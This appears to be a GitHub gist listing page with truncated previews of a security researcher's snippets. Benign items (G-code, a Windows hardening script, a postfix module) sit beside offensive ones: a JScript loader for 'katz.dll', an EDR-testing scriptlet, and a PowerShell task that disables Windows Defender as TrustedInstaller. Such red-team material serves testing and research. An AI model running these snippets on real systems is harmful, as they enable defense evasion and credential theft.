B8 ?? ?? ?? ?? mov eax, ??
BA 00 03 FE 7F mov edx, 7FFE0300h
This file has been truncated, but you can view the full file.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| new ActiveXObject('WScript.Shell').Environment('Process')('TMP') = 'C:\\Tools'; | |
| try { | |
| var manifest = '<?xml version="1.0" encoding="UTF-16" standalone="yes"?> <assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0"> <assemblyIdentity type="win32" name="AllTheThings" version="0.0.0.0"/> <file name="katz.dll"> <comClass description="AllTheThings Class" clsid="{89565276-A714-4a43-912E-978BFEEDACDC}" threadingModel="Both" progid="AllTheThings"/> </file> </assembly>'; | |
| var ax = new ActiveXObject("Microsoft.Windows.ActCtx"); | |
| ax.ManifestText = manifest; | |
| // Create Base64 Object, supports encode, decode | |
| var Base64={characters:"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",encode:function(a){Base64.characters;var r="",c=0;do{var e=a.charCodeAt(c++),t=a.charCodeAt(c++),h=a.charCodeAt(c++),s=(e=e||0)>>2&63,A=(3&e)<<4|(t=t||0)>>4&15,o=(15&t)<<2|(h=h||0)>>6&3,B=63&h;t?h||(B=64):o=B=64,r+=Base64.characters.charAt(s)+Base64.characters. |
xenoscr
/ nt_syscalls.md
Created
November 11, 2021 15:39
— forked from wbenny/nt_syscalls.md
Windows syscall stubs
xenoscr
/ How to use a function pointer in VBA.md
Created
November 10, 2021 20:32
— forked from sancarn/How to use a function pointer in VBA.md
How to use a function pointer in VBA by Akihito Yamashiro
VB6 and VBA come with no support for function pointers.
Also, when you wish to execute a function in a dll using the Declare function, you can only call functions created by the Steadcall calling conversation.
These constraints can be avoided by using the DispCallFunc API. The DispCallFunc is widely used in VB6 when erasing the history of IE. Although the DispCallFunc is known as API for calling the IUnknown interface, in fact, you can also perform other functions other than COM by passing the NULL to the first argument.
As explained in the http://msdn.microsoft.com/en-us/library/ms221473(v=vs.85).aspx , the DispCallFunc argument is as follows.
xenoscr
/ rot.py
Created
November 8, 2021 02:20
— forked from cincodenada/rot.py
Quick binary rotation (rotl/rotr) in Python
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| def rotl(num, bits): | |
| bit = num & (1 << (bits-1)) | |
| num <<= 1 | |
| if(bit): | |
| num |= 1 | |
| num &= (2**bits-1) | |
| return num | |
| def rotr(num, bits): |
xenoscr
/ squiblytest.sct
Created
April 18, 2021 00:45
SquiblyTest - Test Several Dimensions of EDR -
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?XML version="1.0"?> | |
| <scriptlet> | |
| <registration | |
| progid="PoC" | |
| classid="{F0001111-0000-0000-0000-0000FEEDACDC}" > | |
| <!-- Proof Of Concept - Casey Smith @subTee --> | |
| <!-- License: BSD3-Clause --> | |
| <script language="JScript"> | |
| <![CDATA[ | |
xenoscr
/ gist:a9dcee9dff4e442597e97534c905ccb6
Created
March 10, 2021 20:12
— forked from wess/gist:c66382198d48238787718b9bb8e9f3d9
Start/End GCodes for BLTouch Ender 3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ; Ender 3 Custom Start G-code | |
| M140 S{material_bed_temperature_layer_0} ; Set Heat Bed temperature | |
| M190 S{material_bed_temperature_layer_0} ; Wait for Heat Bed temperature | |
| M104 S160; start warming extruder to 160 | |
| G28 ; Home all axes | |
| G29 ; Auto bed-level (BL-Touch) | |
| G92 E0 ; Reset Extruder | |
| M104 S{material_print_temperature_layer_0} ; Set Extruder temperature | |
| G1 X0.1 Y20 Z0.3 F5000.0 ; Move to start position | |
| M109 S{material_print_temperature_layer_0} ; Wait for Extruder temperature |
xenoscr
/ Jenkinsfile
Created
November 20, 2020 21:39
— forked from HarmJ0y/Jenkinsfile
Rubeus Jenkinsfile
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @Library('ci-jenkins-common') _ | |
| // Jenkins build pipeline (declarative) | |
| // Project: Seatbelt | |
| // URL: https://github.com/GhostPack/Seatbelt | |
| // Author: @tifkin_/@harmj0y | |
| // Pipeline Author: harmj0y | |
| def gitURL = "https://github.com/GhostPack/Seatbelt" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| $cmdline = '/C sc.exe config windefend start= disabled && sc.exe sdset windefend D:(D;;GA;;;WD)(D;;GA;;;OW)' | |
| $a = New-ScheduledTaskAction -Execute "cmd.exe" -Argument $cmdline | |
| Register-ScheduledTask -TaskName 'TestTask' -Action $a | |
| $svc = New-Object -ComObject 'Schedule.Service' | |
| $svc.Connect() | |
| $user = 'NT SERVICE\TrustedInstaller' | |
| $folder = $svc.GetFolder('\') |
xenoscr
/ windows_hardening.cmd
Created
May 10, 2020 11:28
— forked from mackwage/windows_hardening.cmd
Script to perform some hardening of Windows OS
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| :: Windows 10 Hardening Script | |
| :: This is based mostly on my own personal research and testing. My objective is to secure/harden Windows 10 as much as possible while not impacting usability at all. (Think being able to run on this computer's of family members so secure them but not increase the chances of them having to call you to troubleshoot something related to it later on). References for virtually all settings can be found at the bottom. Just before the references section, you will always find several security settings commented out as they could lead to compatibility issues in common consumer setups but they're worth considering. | |
| :: Thank you @jaredhaight for the Win Firewall config recommendations! | |
| :: Thank you @ricardojba for the DLL Safe Order Search reg key! | |
| :: Best script I've found for Debloating Windows 10: https://github.com/Sycnex/Windows10Debloater | |
| :: | |
| ::####################################################################### | |
| :: | |
| :: Change file associations to protect against common ransomware |
xenoscr
/ postfix.py
Created
April 29, 2020 16:59
— forked from mgedmin/postfix.py
Ansible module for postfix configuration
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/python | |
| import subprocess | |
| DOCUMENTATION = ''' | |
| --- | |
| module: postfix | |
| short_description: changes postfix configuration parameters | |
| description: | |
| - The M(postfix) module changes postfix configuration by invoking 'postconf'. |
NewerOlder